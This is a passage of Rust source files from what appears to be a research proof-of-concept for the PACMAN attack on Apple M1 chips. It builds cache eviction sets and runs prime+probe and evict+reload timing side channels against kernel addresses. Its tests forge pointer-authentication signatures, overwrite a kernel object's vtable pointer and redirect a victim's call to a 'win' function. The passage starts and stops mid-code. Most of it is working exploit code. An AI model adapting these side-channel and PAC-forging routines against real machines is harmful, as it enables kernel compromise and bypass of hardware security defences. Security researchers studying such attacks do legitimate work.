times[cur_iter_idx] = (latency, latency_limit); 172 | } 173 | 174 | // Make sure to do all printing *AFTER* the tests have completed! 175 | // println!("Reload latency is {} cycles", latency); 176 | print!("["); 177 | for idx in 0..NUM_INST_SPECTRE_KERNEL_TRIALS { 178 | print!("{},", times[idx]); 179 | } 180 | println!("]"); 181 | } 182 | -------------------------------------------------------------------------------- /src/evset.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Generate eviction sets for data / inst pointers 3 | */ 4 | 5 | use crate::*; 6 | use rand::prelude::SliceRandom; 7 | 8 | /// What stride do we take between virtual addresses to generate out evset candidates? 9 | /// If this is a large power of two multiple of page size, it will increase the likelihood of TLB conflicts. 10 | /// To eliminate TLB conflicts, make this a large power of 2 + 1 multiple of page size. 11 | pub const STRIDE : usize = 4096 * cache::PAGE_SIZE; 12 | 13 | pub const EVSET_SIZE_MAX : usize = 1024; 14 | 15 | /** 16 | * Create a data eviction set within a kernel memory region for a given physical address. 17 | * 18 | * `target_paddr` should be a physical address. 19 | * 20 | * # Arguments 21 | * * `target_vaddr`: The virtual address to create an eviction set for. 22 | * * `target_paddr`: The physical address corresponding to `target_vaddr`. 23 | * (can't just compute this as we don't know which address space the target vaddr comes from). 24 | * * `kernel_memory`: The kernel memory region to draw addresses from for the eviction set. 25 | * * `kernel_memory_size`: The size of `kernel_memory`. 26 | * 27 | * # Return Value 28 | * A vector of addresses within `kernel_memory` that will contend with `target_paddr`. 29 | */ 30 | pub unsafe fn data_kpevset(target_vaddr: u64, target_paddr: u64, kernel_memory: u64, kernel_memory_size: usize) -> Vec { 31 | let handle = match PacmanKitConnection::init() { 32 | Some(v) => v, 33 | None => panic!("Couldn't connect to PacmanKit"), 34 | }; 35 | 36 | let mut vec = Vec::new(); 37 | let target_l2_set = cache::get_cache_set_m1(target_paddr); 38 | 39 | // Offset applies to virtual addresses 40 | let memory_region_addr = kernel_memory as usize; 41 | 42 | for i in (0..kernel_memory_size).step_by(128) { 43 | let idx = i; 44 | if idx > kernel_memory_size { 45 | println!("0x{:X}: Out of memory", idx); 46 | break; 47 | } 48 | 49 | let cur_va = kernel_memory + idx as u64; 50 | let cur_pa = handle.kernel_virt_to_phys(cur_va).unwrap(); 51 | // if cache::get_cache_set_m1(cur_va) == cache::get_cache_set_m1(target_vaddr) { 52 | if cache::get_cache_set_m1(cur_pa) == target_l2_set { 53 | vec.push(cur_va); 54 | } 55 | // } 56 | } 57 | 58 | let virt_set_index = cache::get_l1_cache_set_m1(target_vaddr); 59 | for i in &vec { 60 | if cache::get_l1_cache_set_m1(*i) != virt_set_index { 61 | panic!("Incongruent VAs"); 62 | } 63 | } 64 | 65 | return vec; 66 | } 67 | 68 | /** 69 | * Create a data eviction set within a memory region for a given physical address. 70 | * 71 | * `target_paddr` should be a physical address. 72 | * 73 | * # Arguments 74 | * * `target_vaddr`: The virtual address to create an eviction set for. 75 | * * `target_paddr`: The physical address corresponding to `target_vaddr`. 76 | * (can't just compute this as we don't know which address space the target vaddr comes from). 77 | * * `memory_region`: The region to draw addresses from for the eviction set. 78 | * 79 | * # Return Value 80 | * A vector of addresses within `memory_region` that will contend with `target_paddr`. 81 | */ 82 | pub unsafe fn data_pevset(target_vaddr: u64, target_paddr: u64, memory_region: &mut [u8]) -> Vec { 83 | let handle = match PacmanKitConnection::init() { 84 | Some(v) => v, 85 | None => panic!("Couldn't connect to PacmanKit"), 86 | }; 87 | 88 | let mut vec = Vec::new(); 89 | let target_l2_set = cache::get_cache_set_m1(target_paddr); 90 | 91 | // Offset applies to virtual addresses 92 | let memory_region_addr = memory_region.as_ptr() as usize; 93 | let offset = (target_vaddr as usize) & cache::TLB_OFFSET_MASK; 94 | 95 | for i in (0..memory_region.len()).step_by(evset::STRIDE) { 96 | let idx = i + offset; 97 | if idx > memory_region.len() { break; } 98 | 99 | if vec.len() >= EVSET_SIZE_MAX { break; } 100 | 101 | let cur_va = &memory_region[idx] as *const u8 as u64; 102 | 103 | // Uncomment this to use physical translation: 104 | // For now we do NOT use physical translation as we don't need it 105 | // let cur_pa = handle.user_virt_to_phys(cur_va).unwrap(); 106 | // if cache::get_cache_set_m1(cur_pa) == target_l2_set { 107 | vec.push(cur_va); 108 | // } 109 | } 110 | 111 | let virt_set_index = cache::get_l1_cache_set_m1(target_vaddr); 112 | for i in &vec { 113 | if cache::get_l1_cache_set_m1(*i) != virt_set_index { 114 | // panic!("Incongruent VAs"); 115 | } 116 | } 117 | 118 | return vec; 119 | } 120 | 121 | /** 122 | * Create an instruction eviction set within a memory region for a given physical address. 123 | * 124 | * `target_paddr` should be a physical address. 125 | * 126 | * # Arguments 127 | * * `target_vaddr`: The virtual address to create an eviction set for. 128 | * * `target_paddr`: The physical address corresponding to `target_vaddr`. 129 | * (can't just compute this as we don't know which address space the target vaddr comes from). 130 | * 131 | * # Return Value 132 | * A vector of addresses within `memory_region` that will contend with `target_paddr`. 133 | * 134 | * # Side Effects 135 | * Will make parts of memory_region executable, and fill them with instructions to execute. 136 | */ 137 | pub unsafe fn inst_pevset(target_vaddr: u64, target_paddr: u64, memory_region: &mut [u8]) -> Vec { 138 | let evset = data_pevset(target_vaddr, target_paddr, memory_region); 139 | 140 | for entry in &evset { 141 | let pg = core::slice::from_raw_parts_mut(*entry as *mut u8, cache::PAGE_SIZE); 142 | retpoline::mk_retpoline_page(pg).unwrap(); 143 | } 144 | 145 | return evset; 146 | } 147 | 148 | /** 149 | * Create an eviction set for a given data address within a memory region. 150 | * 151 | * `addr` may be contained within `memory_region`. 152 | * 153 | * # Arguments 154 | * * `addr`: The address to create an eviction set for. 155 | * * `memory_region`: A memory region to pick addresses from to create the eviction set. 156 | * 157 | * # Return Value 158 | * A vector of addresses within `memory_region`. 159 | */ 160 | pub fn data_evset(addr: *const u8, memory_region: &mut [u8]) -> Vec<*mut u8> { 161 | let mut vec = Vec::new(); 162 | let ptr = addr as u64; 163 | let memory_region_base = (&memory_region[0] as *const u8) as u64; 164 | 165 | for i in 0..L1D_WAYS { 166 | let offset = ((i + 1) * L1D_SETS * L1D_LINESIZE) << 2; 167 | 168 | if offset > memory_region.len() { 169 | panic!("Cannot create a data eviction set! Out of memory!"); 170 | } 171 | 172 | let new_evset_entry = memory_region_base + (offset as u64); 173 | vec.push(new_evset_entry as *mut u8); 174 | } 175 | 176 | vec.shuffle(&mut thread_rng()); 177 | 178 | return vec; 179 | } 180 | 181 | /** 182 | * Create an eviction set for a given instruction address within a memory region. 183 | * 184 | * `addr` may be contained within `memory_region`. 185 | * 186 | * Note: The regions are treated as instruction slices (not data slices) and hence 187 | * act as pointers to 32 bit values instead of 8 bit values. 188 | * 189 | * # Arguments 190 | * * `addr`: The address to create an eviction set for. 191 | * * `memory_region`: A memory region to pick addresses from to create the eviction set. 192 | * 193 | * # Return Value 194 | * A vector of addresses within `memory_region`. 195 | */ 196 | pub fn inst_evset(addr: *const u32, memory_region: &mut [u32]) -> Vec<*mut u32> { 197 | let mut vec = Vec::new(); 198 | let ptr = addr as u64; 199 | let memory_region_base = (&memory_region[0] as *const u32) as u64; 200 | 201 | for i in 0..L1I_WAYS { 202 | let offset = (i + 1) * L1I_SETS * L1I_LINESIZE; 203 | 204 | if offset > memory_region.len() / 4 { 205 | panic!("Cannot create a data eviction set! Out of memory!"); 206 | } 207 | 208 | let new_evset_entry = memory_region_base + (offset as u64); 209 | vec.push(new_evset_entry as *mut u32); 210 | } 211 | 212 | vec.shuffle(&mut thread_rng()); 213 | 214 | return vec; 215 | } 216 | -------------------------------------------------------------------------------- /src/attacks/prime_probe.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Methods for implementing the actual prime+probe attacks. 3 | */ 4 | use crate::*; 5 | 6 | pub const DATA_EVSET_SIZE : usize = 21; 7 | pub const DATA_MISS_LATENCY : u64 = 40; 8 | 9 | /// How many times to repeat a given trial? 10 | pub const DATA_NUM_ITERS : usize = 50; 11 | 12 | /// How many trials to run? (Each trial == a different PAC) 13 | pub const DATA_NUM_TRIALS : usize = 1024; 14 | 15 | pub const INST_EVSET_SIZE : usize = 11; 16 | pub const INST_MISS_LATENCY : u64 = 40; 17 | 18 | /// How many times to repeat a given trial? 19 | pub const INST_NUM_ITERS : usize = 512; 20 | 21 | /// How many trials to run? (Each trial == a different PAC) 22 | pub const INST_NUM_TRIALS : usize = 32; 23 | 24 | /** 25 | * Data prime+probe 26 | * Begin by priming an eviction set, then do a load, and then 27 | * probe the eviction set, recording the number of misses. 28 | */ 29 | pub unsafe fn data_prime_probe(mem_region: &mut [u8]) { 30 | // -1. Setup PacmanKit 31 | let handle = match PacmanKitConnection::init() { 32 | Some(v) => v, 33 | None => panic!("Couldn't connect to PacmanKit"), 34 | }; 35 | 36 | let mut kernel_mmap_va = match handle.kernel_mmap() { 37 | Ok(v) => v, 38 | Err(err) => panic!("Couldn't call IOMalloc in the kernel!"), 39 | }; 40 | 41 | let kernel_mmap_pa = handle.kernel_virt_to_phys(kernel_mmap_va).unwrap(); 42 | 43 | // // 0. Pick a target 44 | // let target = Box::new(0x41414141u64); 45 | // let target_vaddr = &*target as *const _ as u64; 46 | 47 | // // Sanity check the addressing with Box 48 | // let outval : u64; 49 | // asm!{ 50 | // "ldr {outval}, [{ptr}]", 51 | // outval = out(reg) outval, 52 | // ptr = in(reg) target_vaddr, 53 | // } 54 | // println!("0x{:X} contains 0x{:X}",target_vaddr, outval); 55 | // let target_paddr = handle.user_virt_to_phys(target_vaddr).unwrap(); 56 | 57 | let target_vaddr = kernel_mmap_va; 58 | let target_paddr = kernel_mmap_pa; 59 | 60 | let mut results = [[0; DATA_NUM_ITERS]; DATA_NUM_TRIALS]; 61 | let evset = data_pevset(target_vaddr, target_paddr, mem_region); 62 | let chosen_vec : Vec = evset.choose_multiple(&mut rand::thread_rng(), DATA_EVSET_SIZE).into_iter().cloned().collect(); 63 | let indexes_vec : Vec = (0..chosen_vec.len()).collect(); 64 | 65 | // Copy from vector to array to minimize Rust overhead 66 | let mut chosen = [0u64; DATA_EVSET_SIZE]; 67 | let mut indexes = [0usize; DATA_EVSET_SIZE]; 68 | 69 | for i in 0..DATA_EVSET_SIZE { 70 | chosen[i] = chosen_vec[i]; 71 | indexes[i] = indexes_vec[i]; 72 | } 73 | 74 | // Initialize eviction set 75 | for entry in &evset { 76 | timer::time_access(*entry); 77 | } 78 | 79 | for entry in &chosen { 80 | timer::time_access(*entry); 81 | } 82 | 83 | // Decide which trials should load and which should not 84 | let mut do_loads = [false; DATA_NUM_TRIALS]; 85 | for i in 0..DATA_NUM_TRIALS { 86 | do_loads[i] = crandom::rand() % 2 == 0; 87 | } 88 | 89 | // Each trial tests a different PAC 90 | for trial in 0..DATA_NUM_TRIALS { 91 | let do_load = do_loads[trial]; 92 | 93 | // Number of misses each iteration 94 | let mut samples = [0; DATA_NUM_ITERS]; 95 | 96 | // Each iteration checks the same value multiple times 97 | for iteration in 0..DATA_NUM_ITERS { 98 | indexes.shuffle(&mut thread_rng()); 99 | 100 | // 1. Prime 101 | for _ in 0..12 { 102 | for i in 0..DATA_EVSET_SIZE { 103 | timer::time_access(chosen[indexes[i]]); 104 | } 105 | } 106 | 107 | // 2. Load(?) 108 | // if do_load { 109 | // timer::time_access(target_vaddr); 110 | // } 111 | handle.kernel_read_for_timing(target_vaddr, do_load).unwrap(); 112 | 113 | // 3. Probe 114 | let mut times = [0; DATA_EVSET_SIZE]; 115 | for i in (0..DATA_EVSET_SIZE).rev() { 116 | times[i] = timer::time_access(chosen[indexes[i]]); 117 | } 118 | 119 | let mut misses = 0; 120 | for i in 0..DATA_EVSET_SIZE { 121 | if times[i] > DATA_MISS_LATENCY { 122 | misses+=1; 123 | } 124 | } 125 | 126 | samples[iteration] = misses; 127 | // println!("{:?}", times); 128 | // println!("{} misses", misses); 129 | } 130 | 131 | results[trial] = samples; 132 | 133 | // println!("To evict: 0x{:X} => 0x{:X}", target_vaddr, target_paddr); 134 | 135 | // for i in 0..DATA_EVSET_SIZE { 136 | // println!("\t0x{:X} => 0x{:X}", chosen[indexes[i]], handle.user_virt_to_phys(chosen[indexes[i]]).unwrap()); 137 | // } 138 | } 139 | 140 | for i in 0..DATA_NUM_TRIALS { 141 | if do_loads[i] { 142 | print!("[*] "); 143 | } 144 | else { 145 | print!("[x] "); 146 | } 147 | results[i].sort(); 148 | let mut avg : u64 = 0; 149 | for j in 0..results[i].len() { 150 | avg += results[i][j]; 151 | } 152 | avg /= results[i].len() as u64; 153 | // println!("{:?}", results[i]); 154 | let median = results[i][results[i].len() / 2]; 155 | println!("{}, {}", median, avg); 156 | } 157 | } 158 | 159 | /** 160 | * Inst prime+probe 161 | * Begin by priming an eviction set, then do an exec, and then 162 | * probe the eviction set, recording the number of misses. 163 | */ 164 | pub unsafe fn inst_prime_probe(mem_region: &mut [u8]) { 165 | // -1. Setup PacmanKit 166 | let handle = match PacmanKitConnection::init() { 167 | Some(v) => v, 168 | None => panic!("Couldn't connect to PacmanKit"), 169 | }; 170 | 171 | // let mut kernel_method_va = handle.leak_method().unwrap(); 172 | let kernel_method_va = handle.get_kernel_base().unwrap() + attacks::pacman::INST_TARGET_OFFSET; 173 | 174 | let kernel_method_pa = handle.kernel_virt_to_phys(kernel_method_va).unwrap(); 175 | 176 | // // 0. Pick a target 177 | let target_vaddr = kernel_method_va; 178 | let target_paddr = kernel_method_pa; 179 | 180 | // let train_vaddr = handle.leak_retpoline().unwrap() | PAC_BITMASK; 181 | 182 | let mut results = [[0; INST_NUM_ITERS]; INST_NUM_TRIALS]; 183 | let evset = inst_pevset(target_vaddr, target_paddr, mem_region); 184 | let chosen_vec : Vec = evset.choose_multiple(&mut rand::thread_rng(), INST_EVSET_SIZE).into_iter().cloned().collect(); 185 | let indexes_vec : Vec = (0..chosen_vec.len()).collect(); 186 | 187 | // Copy from vector to array to minimize Rust overhead 188 | let mut chosen = [0u64; INST_EVSET_SIZE]; 189 | let mut indexes = [0usize; INST_EVSET_SIZE]; 190 | 191 | for i in 0..INST_EVSET_SIZE { 192 | chosen[i] = chosen_vec[i]; 193 | indexes[i] = indexes_vec[i]; 194 | } 195 | 196 | // Initialize eviction set 197 | for entry in &evset { 198 | timer::time_exec(*entry); 199 | } 200 | 201 | for entry in &chosen { 202 | timer::time_exec(*entry); 203 | } 204 | 205 | // Decide which trials should load and which should not 206 | let mut do_loads = [false; INST_NUM_TRIALS]; 207 | for i in 0..INST_NUM_TRIALS { 208 | do_loads[i] = crandom::rand() % 2 == 0; 209 | } 210 | 211 | // Each trial tests a different PAC 212 | for trial in 0..INST_NUM_TRIALS { 213 | let do_load = do_loads[trial]; 214 | 215 | // Number of misses each iteration 216 | let mut samples = [0; INST_NUM_ITERS]; 217 | 218 | // Each iteration checks the same value multiple times 219 | for iteration in 0..INST_NUM_ITERS { 220 | indexes.shuffle(&mut thread_rng()); 221 | 222 | // BEGIN SPECTRE STUFF 223 | // for _ in 0..64 { 224 | // handle.kernel_exec_for_spectre(train_vaddr, 0).unwrap(); 225 | // } 226 | // END SPECTRE STUFF 227 | 228 | // 1. Prime 229 | for _ in 0..12 { 230 | for i in 0..INST_EVSET_SIZE { 231 | timer::time_exec(chosen[indexes[i]]); 232 | } 233 | } 234 | 235 | // 2. Call(?) 236 | // prime+probe only: 237 | // handle.kernel_exec_for_timing(target_vaddr, do_load).unwrap(); 238 | 239 | // Spectre: 240 | handle.kernel_exec_for_spectre(target_vaddr, if do_load {0x0} else {0x50}).unwrap(); 241 | 242 | // 3. Probe 243 | let mut times = [0; INST_EVSET_SIZE]; 244 | for i in (0..INST_EVSET_SIZE).rev() { 245 | times[i] = timer::time_exec(chosen[indexes[i]]); 246 | } 247 | 248 | let mut misses = 0; 249 | for i in 0..INST_EVSET_SIZE { 250 | if times[i] > INST_MISS_LATENCY { 251 | misses+=1; 252 | } 253 | } 254 | 255 | // println!("{:?}", times); 256 | samples[iteration] = misses; 257 | } 258 | 259 | results[trial] = samples; 260 | } 261 | 262 | for i in 0..INST_NUM_TRIALS { 263 | if do_loads[i] { 264 | print!("[*] "); 265 | } 266 | else { 267 | print!("[x] "); 268 | } 269 | results[i].sort(); 270 | let mut avg : u64 = 0; 271 | for j in 0..results[i].len() { 272 | avg += results[i][j]; 273 | } 274 | avg /= results[i].len() as u64; 275 | // println!("{:?}", results[i]); 276 | let median = results[i][results[i].len() / 2]; 277 | println!("{}, {}", median, avg); 278 | } 279 | } 280 | -------------------------------------------------------------------------------- /src/tests.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Test code to manually create eviction sets and confirm data/ instruction contention is visible. 3 | */ 4 | 5 | use crate::*; 6 | 7 | /** 8 | * Compare the different timers. 9 | */ 10 | pub unsafe fn test_timers(shared_mem: &mut [u8]) { 11 | let mut x = 0; 12 | let t1_mach = gettime(); 13 | let t1 = read_volatile(&CTR); 14 | for i in 0..1000 { 15 | x = i / 2 + x; 16 | } 17 | let t2 = read_volatile(&CTR); 18 | let t2_mach = gettime(); 19 | println!("Time difference (thread): {}", t2 - t1); 20 | println!("Time difference (mach): {}", t2_mach - t1_mach); 21 | println!("{}", x); 22 | } 23 | 24 | /** 25 | * Demonstrate a data eviction set. 26 | */ 27 | pub unsafe fn data_ev_set_test(shared_mem: &mut [u8]) { 28 | if !set_core(CoreKind::PCORE) { 29 | println!("Error setting CPU affinity!"); 30 | return; 31 | } 32 | 33 | let evset = data_evset(&shared_mem[0], shared_mem); 34 | 35 | // Demonstrate eviction of shared_mem[0] 36 | println!("reading 0x{:X} twice", &shared_mem[0] as *const u8 as u64); 37 | let t0 = read_counter(); 38 | read_volatile(&shared_mem[0]); 39 | let t1 = read_counter(); 40 | read_volatile(&shared_mem[0]); 41 | let t2 = read_counter(); 42 | 43 | for evaddr in &evset { 44 | read_volatile(*evaddr); 45 | // println!("evicting 0x{:X}", *evaddr as *const u8 as u64); 46 | } 47 | 48 | println!("reading 0x{:X}", &shared_mem[0] as *const u8 as u64); 49 | let t1_2 = read_counter(); 50 | read_volatile(&shared_mem[0]); 51 | let t2_2 = read_counter(); 52 | 53 | println!("Time difference (uncached): {}", t1 - t0); 54 | println!("Time difference (cached): {}", t2 - t1); 55 | println!("Time difference (post-eviction): {}", t2_2 - t1_2); 56 | 57 | println!("========================="); 58 | // Now we show prime probe 59 | // prime 60 | for evaddr in &evset { 61 | read_volatile(*evaddr); 62 | } 63 | 64 | // evict(?) 65 | // for _ in 0..1000{ 66 | // read_volatile(&shared_mem[0]); 67 | // } 68 | 69 | let mut results = [0u64; 0x10000]; 70 | let mut cur_idx : usize = 0; 71 | 72 | // probe 73 | for evaddr in &evset { 74 | asm!{"isb"} 75 | let t1_3 = read_counter(); 76 | read_volatile(*evaddr); 77 | let t2_3 = read_counter(); 78 | results[cur_idx] = t2_3 - t1_3; 79 | cur_idx+=1; 80 | } 81 | 82 | println!("prime+probe Results"); 83 | println!("[ ] == Empty, [X] == Cached"); 84 | let mut num_miss = 0; 85 | for idx in 0..evset.len() { 86 | if results[idx] >= 50 { 87 | println!("[ ] {}", results[idx]); 88 | num_miss+=1; 89 | } 90 | else { 91 | println!("[X] {}", results[idx]); 92 | } 93 | } 94 | println!("{} / {}", num_miss, evset.len()); 95 | } 96 | 97 | /** 98 | * Demonstrate an instruction eviction set. 99 | * DEPRECATED- mk_retpoline method has been removed for performance reasons. 100 | * (physical eviction sets explore far too many addresses to fill a retpoline region before choosing candidates). 101 | */ 102 | // pub unsafe fn inst_ev_set_test(shared_mem: &mut [u8]) { 103 | // let retpoline = match mk_retpoline(shared_mem) { 104 | // None => { 105 | // println!("Couldn't make a retpoline region!"); 106 | // return; 107 | // } 108 | 109 | // Some(x) => x 110 | // }; 111 | 112 | // println!("Retpoline is at 0x{:X}", &retpoline[0] as *const u32 as u64); 113 | // println!("Shared memory is at 0x{:X}", &shared_mem[0] as *const u8 as u64); 114 | // assert_eq!(&retpoline[0] as *const u32 as u64, &shared_mem[0] as *const u8 as u64); 115 | 116 | // let evset = inst_evset(&retpoline[0], retpoline); 117 | 118 | // let retpoline_fn : extern "C" fn() = core::mem::transmute(&retpoline[0]); 119 | 120 | // let t1 = read_counter(); 121 | // asm!{"isb"}; 122 | // retpoline_fn(); 123 | // asm!{"isb"}; 124 | // let t2 = read_counter(); 125 | // asm!{"isb"}; 126 | // retpoline_fn(); 127 | // asm!{"isb"}; 128 | // let t3 = read_counter(); 129 | 130 | // // for i in 1..=6 { 131 | // // let idx = ((19 - i) * 32768) / core::mem::size_of::(); 132 | // // let retpoline_entry : extern "C" fn() = core::mem::transmute(&retpoline[idx]); 133 | // // retpoline_entry(); 134 | // // } 135 | 136 | // for evaddr in evset { 137 | // let retpoline_entry : extern "C" fn() = core::mem::transmute(evaddr); 138 | // asm!{"isb"}; 139 | // retpoline_entry(); 140 | // asm!{"isb"}; 141 | // } 142 | 143 | // let t1_2 = read_counter(); 144 | // asm!{"isb"}; 145 | // retpoline_fn(); 146 | // asm!{"isb"}; 147 | // let t2_2 = read_counter(); 148 | 149 | // println!("Uncached execution time: {}", t2 - t1); 150 | // println!("Cached execution time: {}", t3 - t2); 151 | // println!("Post eviction execution time: {}", t2_2 - t1_2); 152 | // } 153 | 154 | pub unsafe fn inst_pev_set_test(shared_mem: &mut [u8]) { 155 | let handle = match PacmanKitConnection::init() { 156 | Some(v) => v, 157 | None => panic!("Couldn't connect to PacmanKit"), 158 | }; 159 | 160 | let mut kernel_mmap_va = match handle.kernel_mmap() { 161 | Ok(v) => v, 162 | Err(err) => panic!("Couldn't call IOMalloc in the kernel!"), 163 | }; 164 | 165 | let kernel_mmap_pa = handle.kernel_virt_to_phys(kernel_mmap_va).unwrap(); 166 | let target_set = cache::get_cache_set_m1(kernel_mmap_pa); 167 | println!("Kernel mmap VA: 0x{:X}\n PA: 0x{:X}\n", kernel_mmap_va, kernel_mmap_pa); 168 | println!("Generating eviction set to match address with L2 set {}...", target_set); 169 | 170 | let evset = inst_pevset(kernel_mmap_va, kernel_mmap_pa, shared_mem); 171 | println!("Found {} conflicts.", evset.len()); 172 | 173 | println!("{:X?}", evset); 174 | 175 | let retpoline_fn : extern "C" fn() = core::mem::transmute(evset[0]); 176 | println!("Calling 0x{:X}", evset[0]); 177 | 178 | let t1 = read_counter(); 179 | asm!{"isb"}; 180 | retpoline_fn(); 181 | asm!{"isb"}; 182 | let t2 = read_counter(); 183 | asm!{"isb"}; 184 | retpoline_fn(); 185 | asm!{"isb"}; 186 | let t3 = read_counter(); 187 | 188 | for evaddr in evset { 189 | let retpoline_entry : extern "C" fn() = core::mem::transmute(evaddr); 190 | println!("Calling 0x{:X}", evaddr); 191 | asm!{"isb"}; 192 | retpoline_entry(); 193 | asm!{"isb"}; 194 | } 195 | 196 | let t1_2 = read_counter(); 197 | asm!{"isb"}; 198 | retpoline_fn(); 199 | asm!{"isb"}; 200 | let t2_2 = read_counter(); 201 | 202 | println!("Uncached execution time: {}", t2 - t1); 203 | println!("Cached execution time: {}", t3 - t2); 204 | println!("Post eviction execution time: {}", t2_2 - t1_2); 205 | } 206 | 207 | /** 208 | * Test the PacmanKitConnection methods. 209 | */ 210 | pub unsafe fn test_pacmankit() { 211 | let handle = PacmanKitConnection::init().unwrap(); 212 | let kernel_base = handle.get_kernel_base().unwrap(); 213 | println!("Kernel base is at 0x{:X}", kernel_base); 214 | println!("Kernel base contains 0x{:X}", handle.kernel_read(kernel_base).unwrap()); 215 | // handle.kernel_write(kernel_base, 0x4141414141414141).unwrap(); 216 | handle.kernel_write(kernel_base, 0x100000CFEEDFACF).unwrap(); 217 | println!("Kernel base contains 0x{:X}", handle.kernel_read(kernel_base).unwrap()); 218 | println!("Kernel base is at 0x{:X}", handle.kernel_virt_to_phys(kernel_base).unwrap()); 219 | let user_addr = (&handle as *const _) as u64; 220 | println!("User address 0x{:X} has physical address 0x{:X}", user_addr, handle.user_virt_to_phys(user_addr).unwrap()); 221 | println!("Handle is at 0x{:X}", handle.get_handle_loc().unwrap()); 222 | 223 | let cache_test_addr = 0x17F; 224 | println!("Offset is {}", get_cache_offset_m1(cache_test_addr)); 225 | println!("Set is 0x{:X}", get_cache_set_m1(cache_test_addr)); 226 | println!("Tag is 0x{:X}", get_cache_tag_m1(cache_test_addr)); 227 | 228 | let kern_mmap_ptr = match handle.kernel_mmap() { 229 | Ok(mmap_ptr) => mmap_ptr, 230 | Err(error) => panic!("Failed to allocate kernel memory!"), 231 | }; 232 | println!("Got a pointer at 0x{:X}", kern_mmap_ptr); 233 | 234 | handle.kernel_free().unwrap(); 235 | } 236 | 237 | /** 238 | * Test our ability to forge PACs given a PAC(addr, salt) oracle. 239 | ```text 240 | Overview of C++ vtable class signing: 241 | 242 | Let PacmanKitService be a C++ class where the PacmanUser : IOUserClient class 243 | has a public PacmanKitService member variable (not a pointer, just a regular member var). 244 | 245 | PacmanUser: 246 | +------------------+ 247 | | IOUserClient | 248 | +------------------+ 249 | | ... | 250 | | PacmanKitService:| 251 | | +-------------+ | PacmanKitService`vtable: 252 | | | vtable_ptr |--+-----> +--------------------+ 253 | | +-------------+ | | externalMethod_ptr | 254 | | ... | +--------------------+ 255 | +------------------+ 256 | 257 | The PACs can be computed using: 258 | vtable_ptr = PACDA(address = vtable, salt = object | 0xd986); 259 | externalMethod_ptr = PACIA(address = externalMethod, salt = (&vtable | 0xa7d5)) 260 | ``` 261 | */ 262 | pub unsafe fn test_forge_pacs() { 263 | // Handle is used for interfacing with PacmanKit 264 | let handle = PacmanKitConnection::init().unwrap(); 265 | 266 | // Victim handle gives us a victim IOUserClient to exploit 267 | let victim_handle = PacmanKitConnection::init().unwrap(); 268 | 269 | let iouserclient_base = victim_handle.get_handle_loc().unwrap(); 270 | let pacmankitservice = iouserclient_base + pacmankit::PACMANKIT_TO_HELPER; 271 | let pacmankitservice_vtable = handle.kernel_read(pacmankitservice).unwrap(); 272 | let pacmankitservice_vtable_masked = pacmankitservice_vtable | PAC_BITMASK; 273 | let pacmankitservice_externalMethod = handle.kernel_read(pacmankitservice_vtable).unwrap(); 274 | let pacmankitservice_externalMethod_masked = pacmankitservice_externalMethod | PAC_BITMASK; 275 | println!("IOService is at 0x{:X}", iouserclient_base); 276 | println!("PacmanKitService is at 0x{:X}", pacmankitservice); 277 | println!("PacmanKitService`vtable is at 0x{:X}", pacmankitservice_vtable_masked); 278 | println!("PacmanKitService`vtable signed is 0x{:X}", pacmankitservice_vtable); 279 | println!("PacmanKitService`externalMethod signed is 0x{:X}", pacmankitservice_externalMethod); 280 | 281 | let salt_data = get_salt(pacmankitservice | PAC_BITMASK, 0xd986); 282 | let salt_inst = get_salt(pacmankitservice_vtable | PAC_BITMASK, 0xa7d5); 283 | 284 | for _ in 0..1000 { 285 | let forged_vtable_ptr = handle.forge_sign_data(pacmankitservice_vtable_masked, salt_data).unwrap(); 286 | let forged_vtable_entry = handle.forge_sign_inst(pacmankitservice_externalMethod_masked, salt_inst).unwrap(); 287 | println!("Forge-signed vtable is 0x{:X}", forged_vtable_ptr); 288 | println!("Forge-signed externalMethod is 0x{:X}", forged_vtable_entry); 289 | assert_eq!(forged_vtable_ptr, pacmankitservice_vtable); 290 | assert_eq!(forged_vtable_entry, pacmankitservice_externalMethod); 291 | } 292 | 293 | let win_ptr = handle.leak_win().unwrap(); 294 | 295 | // Manually call win: 296 | // handle.kernel_exec_for_timing(win_ptr, true).unwrap(); 297 | 298 | // Forge vtable with mmap region and use that to call win: 299 | let kernel_mmap = handle.kernel_mmap().unwrap(); 300 | let salt_data = get_salt(pacmankitservice | PAC_BITMASK, 0xd986); 301 | let salt_inst = get_salt(kernel_mmap | PAC_BITMASK, 0xa7d5); 302 | let new_vtable_ptr = handle.forge_sign_data(kernel_mmap, salt_data).unwrap(); 303 | let new_vtable_entry = handle.forge_sign_inst(win_ptr, salt_inst).unwrap(); 304 | 305 | handle.kernel_write(kernel_mmap | PAC_BITMASK, new_vtable_entry).unwrap(); 306 | handle.kernel_write(pacmankitservice | PAC_BITMASK, new_vtable_ptr).unwrap(); 307 | 308 | // This should not be redirected... 309 | handle.call_service_routine(0, 1, 2, 3, 4, 5).unwrap(); 310 | 311 | // And this one should be redirected! 312 | victim_handle.call_service_routine(0, 1, 2, 3, 4, 5).unwrap(); 313 | } 314 | -------------------------------------------------------------------------------- /src/attacks/evict_reload.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Generate latency traces for graphing and precise timer metrics using evict+reload. 3 | */ 4 | use crate::*; 5 | use rand::thread_rng; 6 | use rand::prelude::SliceRandom; 7 | 8 | /// Number of different eviction set sizes to try (each trial == a different eviction size) 9 | pub const TRIALS : usize = 256; 10 | 11 | /// Number of times to try a random collection of addresses from the potential eviction set for a given size 12 | pub const NUM_RETRIALS : usize = 25; 13 | 14 | /// How many times to repeat a trial before reporting a latency 15 | pub const TRIAL_REPEAT : usize = 12; 16 | 17 | /** 18 | * Evict+Reload for data accesses. 19 | * 20 | * TLDR: 21 | * ``` 22 | * for num_test_addrs in range(TRIALS): 23 | * for retrial_idx in range(NUM_RETRIALS): 24 | * chosen = evset.sample(num_test_addrs) 25 | * 26 | * for cur_trial in range(TRIAL_REPEAT): 27 | * load test addr 28 | * load chosen set in random order 29 | * reload test addr 30 | * record reload latency 31 | * 32 | * print(average(reload latencies for a given trial size)) 33 | * ``` 34 | */ 35 | pub unsafe fn data_evict_reload(shared_mem: &mut [u8]) { 36 | let handle = match PacmanKitConnection::init() { 37 | Some(v) => v, 38 | None => panic!("Couldn't connect to PacmanKit"), 39 | }; 40 | 41 | let mut kernel_mmap_va = match handle.kernel_mmap() { 42 | Ok(v) => v, 43 | Err(err) => panic!("Couldn't call IOMalloc in the kernel!"), 44 | }; 45 | 46 | let kernel_mmap_pa = 